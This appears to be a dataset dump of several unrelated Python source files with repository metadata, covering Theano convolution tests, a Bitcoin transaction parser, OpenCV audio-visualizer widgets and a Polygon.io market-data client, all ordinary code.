# assert numpy.allclose(old_out[1], new_out[1])
def test_conv_with_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOut = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64) - numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutLoss = T.mean(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
# assert numpy.allclose(old_out[1], new_out[1])
assert numpy.allclose(old_out[2], new_out[2])
assert new_out[0].dtype == 'float64'
assert new_out[2].dtype == 'float64'
if __name__ == '__main__':
unittest.main()
| 7,140
| 53
| 206
|
0a99668876349e7b2f9a56a2f17351b4ba01af2a
| 3,837
|
py
|
Python
|
tests/python_tests.py
|
reasoned-ai/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 8
|
2019-07-22T08:57:20.000Z
|
2021-03-26T13:51:02.000Z
|
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | null | null | null |
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 1
|
2019-11-16T13:37:35.000Z
|
2019-11-16T13:37:35.000Z
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
| 30.696
| 70
| 0.484754
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
class PythonTestCase(NormTestCase):
def test_python_declaration(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
lam = self.execute("test;")
self.assertTrue(lam is not None)
def test_python_query(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
result = self.execute("test();")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, datetime.datetime))
def test_python_query_on_data(self):
script = """
test := {{
import numpy as np
test = np.sin
}};
"""
self.execute(script)
script = """
a := (1, 2, 3)
| (1.1, 2.2, 3.3)
| (0.1, 0.2, 0.3)
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
def test_python_custom_function(self):
script = """
test := {{
def test(x):
return '{}-{}'.format(x.b, x.c)
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, DataFrame))
def test_python_function_projection(self):
script = """
utcnow := {{
from datetime import datetime
utcnow = datetime.utcnow
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
lam = self.execute("a &= utcnow()?time;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['time'] is not None)
def test_python_function_projection2(self):
script = """
gaussian := {{
import numpy as np
def gaussian(v):
return np.exp(-v*v / 2)/np.sqrt(2*np.pi)
}};
"""
self.execute(script)
script = """
a(v: Float, mu: Float) := (1.2, 2.3)
| (1.0, 2.0)
;
"""
self.execute(script)
lam = self.execute("a &= gaussian(v)?p;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['p'] is not None)
def test_python_code_expression(self):
self.execute("test(a: String, b: Integer);")
import pandas as pd
t1 = pd.DataFrame(data={'a': ['a', 'b', 'c'], 'b': [1, 2, 3]})
self.executor.python_context = locals()
lam = self.execute("test(a: String, b: Integer) := {{ t1 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'b', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
t2 = t1
t2.loc[1, 'a'] = 'e'
self.executor.python_context = locals()
lam = self.execute("test := {{ t2 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'e', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
| 3,483
| 14
| 212
|
0a67f4076fdfe5bc717c7292a9258ff71ce35595
| 10,696
|
py
|
Python
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 304
|
2020-02-07T21:05:22.000Z
|
2022-03-24T05:30:37.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 2,107
|
2019-11-05T09:26:16.000Z
|
2022-02-14T13:35:36.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 30
|
2020-03-11T14:36:43.000Z
|
2022-03-07T04:45:17.000Z
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
| 50.691943
| 164
| 0.553291
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['version']['start'] = self._io.pos()
self.version = self._io.read_u4le()
self._debug['version']['end'] = self._io.pos()
self._debug['num_vins']['start'] = self._io.pos()
self.num_vins = self._io.read_u1()
self._debug['num_vins']['end'] = self._io.pos()
self._debug['vins']['start'] = self._io.pos()
self.vins = [None] * (self.num_vins)
for i in range(self.num_vins):
if not 'arr' in self._debug['vins']:
self._debug['vins']['arr'] = []
self._debug['vins']['arr'].append({'start': self._io.pos()})
_t_vins = BitcoinTransaction.Vin(self._io, self, self._root)
_t_vins._read()
self.vins[i] = _t_vins
self._debug['vins']['arr'][i]['end'] = self._io.pos()
self._debug['vins']['end'] = self._io.pos()
self._debug['num_vouts']['start'] = self._io.pos()
self.num_vouts = self._io.read_u1()
self._debug['num_vouts']['end'] = self._io.pos()
self._debug['vouts']['start'] = self._io.pos()
self.vouts = [None] * (self.num_vouts)
for i in range(self.num_vouts):
if not 'arr' in self._debug['vouts']:
self._debug['vouts']['arr'] = []
self._debug['vouts']['arr'].append({'start': self._io.pos()})
_t_vouts = BitcoinTransaction.Vout(self._io, self, self._root)
_t_vouts._read()
self.vouts[i] = _t_vouts
self._debug['vouts']['arr'][i]['end'] = self._io.pos()
self._debug['vouts']['end'] = self._io.pos()
self._debug['locktime']['start'] = self._io.pos()
self.locktime = self._io.read_u4le()
self._debug['locktime']['end'] = self._io.pos()
class Vin(KaitaiStruct):
SEQ_FIELDS = ["txid", "output_id", "len_script", "script_sig", "end_of_vin"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['txid']['start'] = self._io.pos()
self.txid = self._io.read_bytes(32)
self._debug['txid']['end'] = self._io.pos()
self._debug['output_id']['start'] = self._io.pos()
self.output_id = self._io.read_u4le()
self._debug['output_id']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_sig']['start'] = self._io.pos()
self._raw_script_sig = self._io.read_bytes(self.len_script)
_io__raw_script_sig = KaitaiStream(BytesIO(self._raw_script_sig))
self.script_sig = BitcoinTransaction.Vin.ScriptSignature(_io__raw_script_sig, self, self._root)
self.script_sig._read()
self._debug['script_sig']['end'] = self._io.pos()
self._debug['end_of_vin']['start'] = self._io.pos()
self.end_of_vin = self._io.read_bytes(4)
self._debug['end_of_vin']['end'] = self._io.pos()
if not self.end_of_vin == b"\xFF\xFF\xFF\xFF":
raise kaitaistruct.ValidationNotEqualError(b"\xFF\xFF\xFF\xFF", self.end_of_vin, self._io, u"/types/vin/seq/4")
class ScriptSignature(KaitaiStruct):
class SighashType(Enum):
sighash_all = 1
sighash_none = 2
sighash_single = 3
sighash_anyonecanpay = 80
SEQ_FIELDS = ["len_sig_stack", "der_sig", "sig_type", "len_pubkey_stack", "pubkey"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['len_sig_stack']['start'] = self._io.pos()
self.len_sig_stack = self._io.read_u1()
self._debug['len_sig_stack']['end'] = self._io.pos()
self._debug['der_sig']['start'] = self._io.pos()
self.der_sig = BitcoinTransaction.Vin.ScriptSignature.DerSignature(self._io, self, self._root)
self.der_sig._read()
self._debug['der_sig']['end'] = self._io.pos()
self._debug['sig_type']['start'] = self._io.pos()
self.sig_type = KaitaiStream.resolve_enum(BitcoinTransaction.Vin.ScriptSignature.SighashType, self._io.read_u1())
self._debug['sig_type']['end'] = self._io.pos()
self._debug['len_pubkey_stack']['start'] = self._io.pos()
self.len_pubkey_stack = self._io.read_u1()
self._debug['len_pubkey_stack']['end'] = self._io.pos()
self._debug['pubkey']['start'] = self._io.pos()
self.pubkey = BitcoinTransaction.Vin.ScriptSignature.PublicKey(self._io, self, self._root)
self.pubkey._read()
self._debug['pubkey']['end'] = self._io.pos()
class DerSignature(KaitaiStruct):
SEQ_FIELDS = ["sequence", "len_sig", "sep_1", "len_sig_r", "sig_r", "sep_2", "len_sig_s", "sig_s"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['sequence']['start'] = self._io.pos()
self.sequence = self._io.read_bytes(1)
self._debug['sequence']['end'] = self._io.pos()
if not self.sequence == b"\x30":
raise kaitaistruct.ValidationNotEqualError(b"\x30", self.sequence, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/0")
self._debug['len_sig']['start'] = self._io.pos()
self.len_sig = self._io.read_u1()
self._debug['len_sig']['end'] = self._io.pos()
self._debug['sep_1']['start'] = self._io.pos()
self.sep_1 = self._io.read_bytes(1)
self._debug['sep_1']['end'] = self._io.pos()
if not self.sep_1 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_1, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/2")
self._debug['len_sig_r']['start'] = self._io.pos()
self.len_sig_r = self._io.read_u1()
self._debug['len_sig_r']['end'] = self._io.pos()
self._debug['sig_r']['start'] = self._io.pos()
self.sig_r = self._io.read_bytes(self.len_sig_r)
self._debug['sig_r']['end'] = self._io.pos()
self._debug['sep_2']['start'] = self._io.pos()
self.sep_2 = self._io.read_bytes(1)
self._debug['sep_2']['end'] = self._io.pos()
if not self.sep_2 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_2, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/5")
self._debug['len_sig_s']['start'] = self._io.pos()
self.len_sig_s = self._io.read_u1()
self._debug['len_sig_s']['end'] = self._io.pos()
self._debug['sig_s']['start'] = self._io.pos()
self.sig_s = self._io.read_bytes(self.len_sig_s)
self._debug['sig_s']['end'] = self._io.pos()
class PublicKey(KaitaiStruct):
SEQ_FIELDS = ["type", "x", "y"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['type']['start'] = self._io.pos()
self.type = self._io.read_u1()
self._debug['type']['end'] = self._io.pos()
self._debug['x']['start'] = self._io.pos()
self.x = self._io.read_bytes(32)
self._debug['x']['end'] = self._io.pos()
self._debug['y']['start'] = self._io.pos()
self.y = self._io.read_bytes(32)
self._debug['y']['end'] = self._io.pos()
class Vout(KaitaiStruct):
SEQ_FIELDS = ["amount", "len_script", "script_pub_key"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['amount']['start'] = self._io.pos()
self.amount = self._io.read_u8le()
self._debug['amount']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_pub_key']['start'] = self._io.pos()
self.script_pub_key = self._io.read_bytes(self.len_script)
self._debug['script_pub_key']['end'] = self._io.pos()
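A minimal usage sketch for the generated parser above, assuming kaitaistruct is installed and that "tx.bin" (an illustrative file name) holds one serialized legacy Bitcoin transaction; this debug-style generated class needs an explicit _read() call:
from kaitaistruct import KaitaiStream, BytesIO

with open("tx.bin", "rb") as f:  # hypothetical input file
    raw_tx = f.read()

tx = BitcoinTransaction(KaitaiStream(BytesIO(raw_tx)))
tx._read()  # debug-mode classes do not parse in __init__
print(tx.version, tx.num_vins, tx.num_vouts, tx.locktime)
for vin in tx.vins:
    print(vin.output_id, vin.script_sig.sig_type)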
| 8,770
| 1,078
| 107
|
10c64417440fb35fb29c424a295af5fb46bac46b
| 5,951
|
py
|
Python
|
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | 2
|
2021-04-01T16:22:52.000Z
|
2021-05-21T18:01:12.000Z
|
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | null | null | null |
modules/widgets.py
|
ldvlpr-dev/AudioVisualizer-Release
|
23e18b9b96a7bb54a134603b0e41f70b5d8569ad
|
[
"MIT"
] | 2
|
2021-03-31T09:00:58.000Z
|
2021-04-28T18:36:31.000Z
|
import cv2
import numpy as np
| 40.209459
| 214
| 0.59469
|
import cv2
import numpy as np
def hex_to_bgr(hx):
hx = hx.lstrip('#')
return tuple(int(hx[i:i + 2], 16) for i in (0, 2, 4))[::-1]
class Rectangle:
def __init__(self, x, y, width, height, max_height, min_db, max_db, color, thickness, reverse):
self.rev = -1 if reverse else 1
self.x = x
self.y = y
self.width = width
self.x2 = self.x + self.width
self.color = color
self.thickness = thickness
self.min_height = height
self.max_height = max_height
self.max_db = max_db
self.min_db = min_db
self.height = height
self.ratio = (self.max_height - self.min_height)/(
self.max_db - self.min_db)
def draw(self, db, dt, frame):
desired_height = db * self.ratio + self.max_height
speed = (desired_height - self.height)/0.1
self.height += speed * dt
self.height = max(
min(self.height, self.max_height), self.min_height)
cv2.rectangle(
frame,
(int(self.x), int(self.y)),
(int(self.x2), int(self.y+self.height)),
color=self.color,
thickness=self.thickness
)
class Circle:
def __init__(self, x, y, width, height, max_height, min_db, max_db, color, thickness):
self.x = x
self.y = y
self.width = width
self.color = color
self.thickness = thickness
self.min_height = height
self.max_height = max_height
self.max_db = max_db
self.min_db = min_db
self.height = height
self.ratio = (self.max_height - self.min_height)/(
self.max_db - self.min_db)
def draw(self, db, dt, frame):
desired_height = db * self.ratio + self.max_height
speed = (desired_height - self.height)/0.1
self.height += speed * dt
self.height = max(
min(self.height, self.max_height), self.min_height)
cv2.circle(frame, center=(int(self.x), int(self.y)), radius=int(
self.height), color=self.color, thickness=self.thickness, lineType=cv2.LINE_AA)
class ColorWoofer:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.x, self.y, self.freqs = int(
kwargs["x"]), int(kwargs["y"]), kwargs["freqs"]
self.colors = [(255, 0, 0), (0, 0, 255)]
self.thickness = int(kwargs["thickness"])
self.height = int(kwargs["height"])
self.min_decibel = int(kwargs["min_decibel"])
self.max_decibel = int(kwargs["max_decibel"])
self.colorsLen = len(self.colors)
self.ratio = (self.max_decibel-self.min_decibel)/(len(self.colors)-1)
def draw(self, db, frame):
db = min(-sum(db), self.max_decibel)
if db <= self.min_decibel:
color = self.colors[0]
else:
color = self.colors[min(
int(self.ratio*(self.max_decibel-db)), self.colorsLen-1)]
cv2.circle(frame, center=(int(self.x), int(self.y)), radius=int(
self.height), color=color, thickness=self.thickness, lineType=cv2.LINE_AA)
class FreqVisualizerGroup:
def __init__(self, **kwargs):
self.direction = kwargs['direction']
self.type = kwargs["freqvolumetype"]
self.name = kwargs["name"]
self.freqs = kwargs["freqs"]
self.x = 0
self.y = int(kwargs["s_height"]) if self.direction == "up" else 0
self.color = hex_to_bgr(kwargs["color"])
self.thickness = int(kwargs["thickness"])
self.width, self.min_height, self.max_height = int(kwargs[
"width"]), int(kwargs["min_height"]), int(kwargs["max_height"])
self.min_decibel = int(kwargs["min_decibel"])
self.max_decibel = int(kwargs["max_decibel"])
self.shapes = []
if self.type == "rectangle":
for i in range(len(self.freqs)):
self.shapes.append(
Rectangle(self.x + i*self.width, self.y, self.width, self.min_height, self.max_height, self.min_decibel, self.max_decibel, self.color, self.thickness, True if self.direction == "up" else False))
elif self.type == "circle":
self.y = (self.y - int(kwargs["circle_y_gap"]) - self.max_height) if self.direction == "up" else (
self.y + int(kwargs["circle_y_gap"]) + self.max_height)
for i in range(len(self.freqs)):
self.shapes.append(
Circle(self.x + i*self.width, self.y, self.width, self.min_height, self.max_height, self.min_decibel, self.max_decibel, self.color, self.thickness))
def draw(self, dt, db, frame):
for (i, shape) in enumerate(self.shapes):
shape.draw(db[i], dt, frame)
class BeatVisualizer:
def __init__(self, **kwargs):
self.name = kwargs["name"]
self.x, self.y, self.min_height, self.height, self.color = int(kwargs["x"]), int(kwargs[
"y"]), int(kwargs["min_height"]), int(kwargs["min_height"]), hex_to_bgr(kwargs["color"])
self.beat_every_x_sec = int(kwargs["bpm"])/60
self.effect_strenght = 0
self.max_effect_strenght = int(kwargs["max_effect_strenght"])
self.delay_tolerance = kwargs["delay_tolerance"]
self.thickness = int(kwargs["thickness"])
self.first_time = float(kwargs["first_time"])
self.speed = 200
def draw(self, **kwargs):
t = kwargs["time"]-self.first_time
if t < 0:
pass
elif abs(t % self.beat_every_x_sec) < self.delay_tolerance:
self.effect_strenght = self.max_effect_strenght
if self.effect_strenght < 0:
self.effect_strenght = 0
self.effect_strenght -= kwargs["dt"] * self.speed
cv2.circle(kwargs["frame"], center=(int(self.x), int(self.y)), radius=int(
self.min_height + self.effect_strenght), color=self.color, thickness=self.thickness, lineType=cv2.LINE_AA)
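A hedged usage sketch for the Rectangle widget above: draw one animated bar onto a blank frame; every numeric value here is illustrative rather than taken from the project's configuration.
frame = np.zeros((720, 1280, 3), dtype=np.uint8)  # blank BGR frame
bar = Rectangle(x=10, y=0, width=20, height=10, max_height=300,
                min_db=-80, max_db=0, color=(0, 255, 0), thickness=-1,
                reverse=False)
bar.draw(db=-20, dt=1 / 30, frame=frame)  # ease the bar toward the level for -20 dB
cv2.imwrite("bar_demo.png", frame)  # output path is illustrative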
| 5,523
| -11
| 403
|
0b5bf0d5fdf0bab0a0494fecb3c1227a2fd961bb
| 21,768
|
py
|
Python
|
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | 1
|
2019-11-19T20:56:27.000Z
|
2019-11-19T20:56:27.000Z
|
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | null | null | null |
polygon/rest/reference.py
|
Polygon-io/client-python
|
beddb8cbf9e77effa52c40878ab5aefa5f8bef85
|
[
"MIT"
] | null | null | null |
from .base import BaseClient
from typing import Optional, Any, Dict, List, Union, Iterator
from .models import (
MarketHoliday,
MarketStatus,
Ticker,
TickerDetails,
TickerNews,
TickerTypes,
Sort,
Order,
AssetClass,
Locale,
Split,
Dividend,
DividendType,
Frequency,
Condition,
DataType,
SIP,
Exchange,
OptionsContract,
)
from urllib3 import HTTPResponse
from datetime import date
| 44.064777
| 308
| 0.642181
|
from .base import BaseClient
from typing import Optional, Any, Dict, List, Union, Iterator
from .models import (
MarketHoliday,
MarketStatus,
Ticker,
TickerDetails,
TickerNews,
TickerTypes,
Sort,
Order,
AssetClass,
Locale,
Split,
Dividend,
DividendType,
Frequency,
Condition,
DataType,
SIP,
Exchange,
OptionsContract,
)
from urllib3 import HTTPResponse
from datetime import date
class MarketsClient(BaseClient):
def get_market_holidays(
self, params: Optional[Dict[str, Any]] = None, raw: bool = False
) -> Union[List[MarketHoliday], HTTPResponse]:
"""
Get upcoming market holidays and their open/close times.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: List of market holidays.
"""
url = "/v1/marketstatus/upcoming"
return self._get(
path=url,
params=params,
deserializer=MarketHoliday.from_dict,
raw=raw,
result_key="",
)
def get_market_status(
self, params: Optional[Dict[str, Any]] = None, raw: bool = False
) -> Union[MarketStatus, HTTPResponse]:
"""
Get the current trading status of the exchanges and overall financial markets.
:param params: Any additional query params.
:param raw: Return HTTPResponse object instead of results object.
:return: Market status.
"""
url = "/v1/marketstatus/now"
return self._get(
path=url, params=params, deserializer=MarketStatus.from_dict, raw=raw
)
class TickersClient(BaseClient):
def list_tickers(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
type: Optional[str] = None,
market: Optional[str] = None,
exchange: Optional[str] = None,
cusip: Optional[int] = None,
cik: Optional[int] = None,
date: Optional[str] = None,
active: Optional[bool] = None,
search: Optional[str] = None,
limit: Optional[int] = 10,
sort: Optional[Union[str, Sort]] = "ticker",
order: Optional[Union[str, Order]] = "asc",
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Ticker], HTTPResponse]:
"""
Query all ticker symbols which are supported by Polygon.io. This API currently includes Stocks/Equities, Crypto, and Forex.
:param ticker: Specify a ticker symbol. Defaults to empty string which queries all tickers.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param type: Specify the type of the tickers. Find the types that we support via our Ticker Types API. Defaults to empty string which queries all types.
:param market: Filter by market type. By default all markets are included.
:param exchange: Specify the primary exchange of the asset in the ISO code format. Find more information about the ISO codes at the ISO org website. Defaults to empty string which queries all exchanges.
:param cusip: Specify the CUSIP code of the asset you want to search for. Find more information about CUSIP codes at their website. Defaults to empty string which queries all CUSIPs.
:param cik: Specify the CIK of the asset you want to search for. Find more information about CIK codes at their website. Defaults to empty string which queries all CIKs.
:param date: Specify a point in time to retrieve tickers available on that date. Defaults to the most recent available date.
:param search: Search for terms within the ticker and/or company name.
:param active: Specify if the tickers returned should be actively traded on the queried date. Default is true.
:param limit: Limit the size of the response, default is 100 and max is 1000.
:param sort: The field to sort the results on. Default is ticker. If the search query parameter is present, sort is ignored and results are ordered by relevance.
:param order: The order to sort the results on. Default is asc (ascending).
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of tickers.
"""
url = "/v3/reference/tickers"
return self._paginate(
path=url,
params=self._get_params(self.list_tickers, locals()),
raw=raw,
deserializer=Ticker.from_dict,
)
def get_ticker_details(
self,
ticker: Optional[str] = None,
date: Optional[str] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[TickerDetails, HTTPResponse]:
"""
Get a single ticker supported by Polygon.io. This response will have detailed information about the ticker and the company behind it.
:param ticker: The ticker symbol of the asset.
:param date: Specify a point in time to get information about the ticker available on that date. When retrieving information from SEC filings, we compare this date with the period of report date on the SEC filing.
:param params: Any additional query params
:param raw: Return raw object instead of results object
:return: Ticker Details V3
"""
url = f"/v3/reference/tickers/{ticker}"
return self._get(
path=url,
params=params,
deserializer=TickerDetails.from_dict,
raw=raw,
result_key="results",
)
def list_ticker_news(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
published_utc: Optional[str] = None,
published_utc_lt: Optional[str] = None,
published_utc_lte: Optional[str] = None,
published_utc_gt: Optional[str] = None,
published_utc_gte: Optional[str] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[TickerNews], HTTPResponse]:
"""
Get the most recent news articles relating to a stock ticker symbol, including a summary of the article and a link to the original source.
:param ticker: Return results that contain this ticker.
:param published_utc: Return results published on, before, or after this date.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Ticker News.
"""
url = "/v2/reference/news"
return self._paginate(
path=url,
params=self._get_params(self.list_ticker_news, locals()),
raw=raw,
deserializer=TickerNews.from_dict,
)
def get_ticker_types(
self,
asset_class: Optional[Union[str, AssetClass]] = None,
locale: Optional[Union[str, Locale]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[List[TickerTypes], HTTPResponse]:
"""
List all ticker types that Polygon.io has.
:param asset_class: Filter by asset class.
:param locale: Filter by locale.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: Ticker Types.
"""
url = "/v3/reference/tickers/types"
return self._get(
path=url,
params=params,
deserializer=TickerTypes.from_dict,
raw=raw,
result_key="results",
)
class SplitsClient(BaseClient):
def list_splits(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
execution_date: Optional[Union[str, date]] = None,
execution_date_lt: Optional[Union[str, date]] = None,
execution_date_lte: Optional[Union[str, date]] = None,
execution_date_gt: Optional[Union[str, date]] = None,
execution_date_gte: Optional[Union[str, date]] = None,
reverse_split: Optional[bool] = None,
limit: Optional[int] = None,
sort: Optional[Union[str, Sort]] = None,
order: Optional[Union[str, Order]] = None,
params: Optional[Dict[str, Any]] = None,
raw: bool = False,
) -> Union[Iterator[Split], HTTPResponse]:
"""
Get a list of historical stock splits, including the ticker symbol, the execution date, and the factors of the split ratio.
:param ticker: Return the stock splits that contain this ticker.
:param ticker_lt: Ticker less than.
:param ticker_lte: Ticker less than or equal to.
:param ticker_gt: Ticker greater than.
:param ticker_gte: Ticker greater than or equal to.
:param execution_date: Query by execution date with the format YYYY-MM-DD.
:param execution_date_lt: Execution date less than.
:param execution_date_lte: Execution date less than or equal to.
:param execution_date_gt: Execution date greater than.
:param execution_date_gte: Execution date greater than or equal to.
:param reverse_split: Query for reverse stock splits. A split ratio where split_from is greater than split_to represents a reverse split. By default this filter is not used.
:param limit: Limit the number of results returned, default is 10 and max is 1000.
:param sort: Sort field used for ordering.
:param order: Order results based on the sort field.
:param params: Any additional query params.
:param raw: Return raw object instead of results object.
:return: List of splits.
"""
url = "/v3/reference/splits"
return self._paginate(
path=url,
params=self._get_params(self.list_splits, locals()),
raw=raw,
deserializer=Split.from_dict,
)
class DividendsClient(BaseClient):
def list_dividends(
self,
ticker: Optional[str] = None,
ticker_lt: Optional[str] = None,
ticker_lte: Optional[str] = None,
ticker_gt: Optional[str] = None,
ticker_gte: Optional[str] = None,
ex_dividend_date: Optional[Union[str, date]] = None,
ex_dividend_date_lt: Optional[Union[str, date]] = None,
ex_dividend_date_lte: Optional[Union[str, date]] = None,
